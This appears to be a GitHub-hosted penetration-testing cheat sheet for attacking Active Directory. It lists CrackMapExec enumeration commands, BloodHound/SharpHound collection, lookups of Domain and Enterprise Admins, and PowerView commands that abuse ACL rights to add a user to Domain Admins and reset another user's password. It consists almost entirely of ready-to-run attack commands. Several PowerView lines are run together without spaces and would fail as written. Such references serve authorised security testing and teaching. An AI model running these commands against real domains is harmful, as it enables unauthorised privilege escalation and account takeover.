You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
# Enumerate users
crackmapexec smb <DC_IP> -u user -p pass --users
# Enumerate groups
crackmapexec smb <DC_IP> -u user -p pass --groups
# Enumerate shares
crackmapexec smb <DC_IP> -u user -p pass --shares
# Enumerate sessions
crackmapexec smb <DC_IP> -u user -p pass --sessions
# Check for privileged users
crackmapexec smb <DC_IP> -u user -p pass --loggedon-users
Using BloodHound
# Ingest data with SharpHound (Windows)
.\SharpHound.exe -c All
# Or with BloodHound.py (Linux)
bloodhound-python -u user -p pass -d domain.local -dc <DC_IP> -c All
# Upload to BloodHound and analyze paths
crackmapexec ldap <DC_IP> -u user -p pass --groups "Domain Admins"
net group "Domain Admins" /domain
Find Enterprise Admins (forest root):
net group "Enterprise Admins" /domain
ACL Abuse
Check ACLs with BloodHound:
Look for GenericAll, GenericWrite, WriteDacl, WriteOwner
Find shortest path to Domain Admins
Abuse ACLs with PowerView:
# Check permissions on objectGet-ObjectAcl-Identity "DC=domain,DC=local"-ResolveGUIDs
# Add user to group (if GenericAll)Add-DomainGroupMember-Identity "Domain Admins"-Members user
# Modify user password (if GenericWrite)Set-DomainUserPassword-Identity user -AccountPassword (ConvertTo-SecureString"Password123!"-AsPlainText -Force)